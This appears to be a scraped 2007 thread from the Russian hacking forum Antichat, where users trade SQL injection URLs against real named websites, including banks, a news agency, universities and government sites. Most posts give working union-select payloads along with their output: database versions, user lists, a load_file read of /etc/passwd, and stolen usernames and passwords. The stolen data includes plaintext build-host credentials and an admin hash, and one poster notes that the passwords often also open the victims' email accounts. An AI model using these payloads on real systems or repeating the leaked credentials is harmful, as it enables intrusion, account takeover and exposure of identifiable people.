Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
18.10.2007, 19:14
|
|
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
Провел на форуме:
2238549
Репутация:
1318
|
|
С чего ты взял что из-за тире? Скорее всего прав нету для доступа к этой таблице.
|
|
|
18.10.2007, 20:22
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
Сообщение от groundhog
С чего ты взял что из-за тире? Скорее всего прав нету для доступа к этой таблице.
Может и так, но на скуль
http://www.ankil.ru/ibs/ibs_program_tpl.php?program_id=-1'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13+from +ita-forum.itaf_user/*
ошибка
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-forum.itaf_user/*' AND p.program_active='on' AND p.program_teacher_id=t' at line 3
------------------------------------------------------------------
|
|
|
|
19.10.2007, 14:53
|
|
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
Провел на форуме:
2238549
Репутация:
1318
|
|
http://www.operator.vesti.ru/
Слепой SQL-Injection с фильтруемой кавычкой на сайте информационного агентства "ВЕСТИ". В Oracle имеется куча таблиц, куча схем, коммерческая информация... В общем очень большой объём. Вникать что к чему не было времени. Кому интересно - разбирайтесь. Атака была начата с поддомена чтобы не светиться особо с багой.
По характерному поведению удалось выяснить, что там крутится Oracle:
http://www.operator.vesti.ru/photoclub?usr_id=-362+UNION+SELECT+T.B,NULL,NULL,NULL,NULL,NULL,NULL ,NULL,NULL,NULL+FROM+(SELECT+ROWNUM+R,BANNER+B+FRO M+V$VERSION)+T+WHERE+R=1+--+
http://www.operator.vesti.ru/photoclub?usr_id=-362+UNION+SELECT+T.B,NULL,NULL,NULL,NULL,NULL,NULL ,NULL,NULL,NULL+FROM+(SELECT+ROWNUM+R,BANNER+B+FRO M+V$VERSION)+T+WHERE+R=2+--+
http://www.operator.vesti.ru/photoclub?usr_id=-362+UNION+SELECT+T.B,NULL,NULL,NULL,NULL,NULL,NULL ,NULL,NULL,NULL+FROM+(SELECT+ROWNUM+R,BANNER+B+FRO M+V$VERSION)+T+WHERE+R=3+--+
http://www.operator.vesti.ru/photoclub?usr_id=-362+UNION+SELECT+T.B,NULL,NULL,NULL,NULL,NULL,NULL ,NULL,NULL,NULL+FROM+(SELECT+ROWNUM+R,BANNER+B+FRO M+V$VERSION)+T+WHERE+R=4+--+
http://www.operator.vesti.ru/photoclub?usr_id=-362+UNION+SELECT+T.B,NULL,NULL,NULL,NULL,NULL,NULL ,NULL,NULL,NULL+FROM+(SELECT+ROWNUM+R,BANNER+B+FRO M+V$VERSION)+T+WHERE+R=5+--+
Oracle9i Enterprise Edition Release 9.2.0.4.0 - 64bit Production
PL/SQL Release 9.2.0.4.0 - Production
CORE 9.2.0.3.0 Production
TNS for Solaris: Version 9.2.0.4.0 - Production
NLSRTL Version 9.2.0.4.0 - Production
http://www.operator.vesti.ru/photoclub?usr_id=-362+UNION+SELECT+USER,NULL,NULL,NULL,NULL,NULL,NUL L,NULL,NULL,NULL+FROM+DUAL+--+
Пользователь, от которого работает пага: www
http://www.operator.vesti.ru/photoclub?usr_id=-362+UNION+SELECT+T.UN,NULL,NULL,NULL,NULL,NULL,NUL L,NULL,NULL,NULL+FROM+(SELECT+ROWNUM+R,USERNAME+UN +FROM+ALL_USERS)+T+WHERE+R=X+--+
Можем посмотреть других порегеных пользователей: UTRO, RTRSALE, CULTTV, CULTRADIO, CULTGDRZ, RADIORUS, CULTCORP, CAMERAMAN, AGENCY, RMANCAT, EXPORTER, WWW, SSL, BVB, ALINA, NIKOLAEVA, OPERATOR, LOADER, KIRA_CH, NEWSUN, GENE, BELKINA, ANGELINA, IGRITSKY, BABINTSEVA, BEREZHANSKII, LOGUNOV, PRIOROV, BIRD, FISHER, RYABOVA, ANDREEVA, MALASH, TITOVA, YUDINA, ELIAS, TRAVINSKAYA, SKOPINCEVA, ARTUR, DENIS и т.д.
http://www.operator.vesti.ru/photoclub?usr_id=-362+UNION+SELECT+T.TN||CHR(32)||CHR(45)||CHR(32)|| T.O,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL+F ROM+(SELECT+ROWNUM+R,TABLE_NAME+TN,OWNER+O+FROM+AL L_TABLES)+T+WHERE+R=X+--+
Смотрим таблиц и овнеров таблиц. Не забываем, что наш овнер - www
http://www.operator.vesti.ru/photoclub?usr_id=-362+UNION+SELECT+T.TN,NULL,NULL,NULL,NULL,NULL,NUL L,NULL,NULL,NULL+FROM+(SELECT+ROWNUM+R,TABLE_NAME+ TN+FROM+ALL_TABLES+WHERE+OWNER=CHR(..)||...||CHR(. ..))+T+WHERE+R=X+--+
Можем смотреть таблицы по определённому овнеру. Овнера разумеется посимвольно заворачиваем в CHR().
http://www.operator.vesti.ru/photoclub?usr_id=-362+UNION+SELECT+T.CN,NULL,NULL,NULL,NULL,NULL,NUL L,NULL,NULL,NULL+FROM+(SELECT+COLUMN_NAME+FROM+USE R_TAB_COLUMNS+WHERE+TABLE_NAME=CHR(70)||CHR(85)||C HR(83)||CHR(69)||CHR(82)||CHR(83))+T+WHERE+R=X+--+
Так можно смотреть имена полей таблиц на примере таблицы FUSERS.
|
|
|
|
19.10.2007, 16:13
|
|
Участник форума
Регистрация: 02.08.2007
Сообщений: 242
Провел на форуме:
1373642
Репутация:
569
|
|
Для любителей джаза
код:
http://www.souljazzrecords.co.uk/releases/?id=4973+union+select+1,concat(password,0x3a,email ),3,4,5,6,7,8,9,10,11,12,13,14+from+accounts+limit +3907,1/*
в поле логина вводить емейл
p.s в большинстве случаев пароли так-же подходят к почтовым ящикам  |
|
|
|
19.10.2007, 17:22
|
|
Участник форума
Регистрация: 08.09.2007
Сообщений: 211
Провел на форуме:
5076186
Репутация:
778
|
|
Код:
http://www.transinvestbank.ru /docs/tpl/new.asp?id=1+or+1=@ @version--
Microsoft SQL Server 2000 - 8.00.2040 (Intel X86) May 13 2005 18:33:17 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 1)
Выводим таблицу где есть колонка password
Код:
http://www.transinvestbank.ru /docs/tpl/new.asp?id=1+or+1=(select+top+1+ table_name+from+information_schema.columns+where+column_name+like+'password')--
Нужная таблица - users =)
Узнаём имена колонок
http://www.transinvestbank.ru /docs/tpl/new.asp?id=1+or+1=(select+ top+1+column_name+from+information_schema.columns+ where+table_name='users'+and+column_name+not+in+(' id','status','registrationDate','lastVisitDate','d enyAccess','hidden','days','pages','lockoutCnt','l ockoutDT','login','password','firstName','middleNa me','lastName','shortName','longName','ip','email' ,'phone','fax',%20'address'%20,'organization','dep artment','position'%20,'certCN','certData','certSt ate','denyDate','denyReason','description'))--
На этом, пожалуй, остановимся =))
Код:
http://www.elporvenir. com.mx/avisos_cat.asp? cat_id=1+or+1=@@version--
Код:
http://www.cap.edu.mx /Content.aspx? ID=1+or+1=@@version--
Код:
http://www.correo-gto.com.mx /notas.asp?id= 1+or+1=@@version--
Код:
http://www.tashop.ru /order/frame.asp?id= 1+or+1=@@version--
Последний раз редактировалось Nea7; 19.10.2007 в 17:25..
|
|
|
|
19.10.2007, 18:01
|
|
Участник форума
Регистрация: 25.05.2007
Сообщений: 147
Провел на форуме:
2313429
Репутация:
728
|
|
Северо-Восточный Инвестиционный Банк
http://www.svib.ru/ru/news/index.php?id=-18+union+select+1,2,3,VERSION(),5,6,7 ,8,9,10/*
User: svib_www1@v52.valuehost.ru
Version: 4.0.27-max-log
|
|
|
|
19.10.2007, 18:24
|
|
Новичок
Регистрация: 16.09.2007
Сообщений: 25
Провел на форуме:
120760
Репутация:
62
|
|
Код:
http://www.recsports.uga.edu/club_profile.php?ID=-1+union+select+1,2,3,4,5,6,7,load_file(0x2F6574632F706173737764),9/*
http://www.recsports.uga.edu/club_profile.php?ID=-1+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,Username,userpass),9+from+hpsas_recsports.Tigeradmin_Users/*
http://www.recsports.uga.edu/club_profile.php?ID=-1+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,user,password),9+from+mysql.user/*
Код:
http://www.essor.gov.ml/cgi-bin/view_article.pl?id=-1+union+select+1,user,password,4,5,6,7,8,9+from+mysql.user--
|
|
|
|
19.10.2007, 20:37
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
http://www.gelyon.ru/news.php?id=-1+union+select+1,2,concat(version(),0x2F,database( ),0x2F,user()),4,5,6/*
4.0.26/wwwgelyonru/gelyon@box.hc.ru
http://www.head-hunting.ru/z_parser.php?base_name=headhunting_second&id=-1+union+select+1,2,concat(version(),0x2F,database( ),0x2F,user()),4,5,6,7/*
4.1.21-log/db00084672/00084672@localhost
http://www.solange.ru/gallery/show.phtm?s=14&z=0&t=-1+union+select+concat(version(),0x2F,database(),0x 2F,user()),2,3,4,5,6,7,8,9,10/*
4.1.21-standard/intermoda/intermoda@83.69.224.34
http://www.chernomor.com/vzrosltours.php?tp=1&obj=-1+union+select+1,2,3,4,5,6,concat(version(),0x2F,d atabase(),0x2F,user()),8,9,10/*
4.1.22-standard/chernomo_main/chernomo_main@localhost
http://fest.camps.su/event.php?id=-1+union+select+1,2,concat(version(),0x2F,database( ),0x2F,user()),4/*
4.1.21-standard-log/campssu_main/campssu_user@localhost
|
|
|
|
19.10.2007, 22:11
|
|
Участник форума
Регистрация: 08.09.2007
Сообщений: 211
Провел на форуме:
5076186
Репутация:
778
|
|
Код:
http://www.monbat.com/index.php?l_id=-1+union+select+1,2,concat(user(),0x3a,version(),0x3a,database()),4/*&change_lang=yes
DOTSTUDIO@LOCALHOST:5.0.45-LOG:WEB
Код:
http://www.oursportscentral.com/services/maps/largemap.php?l_id=-1'+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5/*
oursport_public@localhost:4.1.20-log:oursport_osc
Код:
http://www.rentayacht.gr/location.php?l_id=-1+union+select+1,2,3,4,5,aes_decrypt(aes_encrypt(version(),0x71),0x71),7,8,9,10,11/*
Код:
http://www.oli-lacke.de/firma.php?m_id=1&l_id=-1+union+select+1,2,3,4,5,6,concat(user(),0x3a,version(),0x3a,database()),8/*&lang=ru
ftp33970@manganese.webpack.hosteurope.de:5.0.32-Debian_7etch1~bpo.1-log:oli_lacke_de
Код:
http://www.ntnui.no/ogruppa/paamelding/paameldingsliste.php?l_id=9999+union+select+1,2,3,4,concat(user(),0x3a,version(),0x3a,database()),6,7,8,9,10,11,12,13,14,15,16/*
ogruppa_db@textus8.itea.ntnu.no:4.0.18-Max:ogruppa_db |
|
|
|
19.10.2007, 22:19
|
|
Постоянный
Регистрация: 05.12.2004
Сообщений: 647
Провел на форуме:
1698585
Репутация:
818
|
|
_http://www.ppckernel.org/tree.php?id=-3+union+select+1,concat_ws(0x3a,name,pass,hostname ),3+from+buildhosts
dev:Jahdeha5:dev.build.ppckernel.org
hercules:hohKie4r:hercules.xorsis.com
hermes:Chofei5w:hermes.ppckernel.org
m2:yie7Phoi:m2.bccd.cluster.earlham.edu
c15:lohcooD2:c15.cluster.earlham.edu
acl2:eeceaZ8u:acl2.cs.earlham.edu
tobias:tmb2h3a:tobias.cluster.earlham.edu
hermes64:Chofei5w:hermes.ppckernel.org
_http://www.dccentralkitchen.org/program.php?id=3+union+select+1,username,password, 4,5,6+from+users
admin:c84258e9c39059a89ab77d846ddab909 мд5()
admin:admin2
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
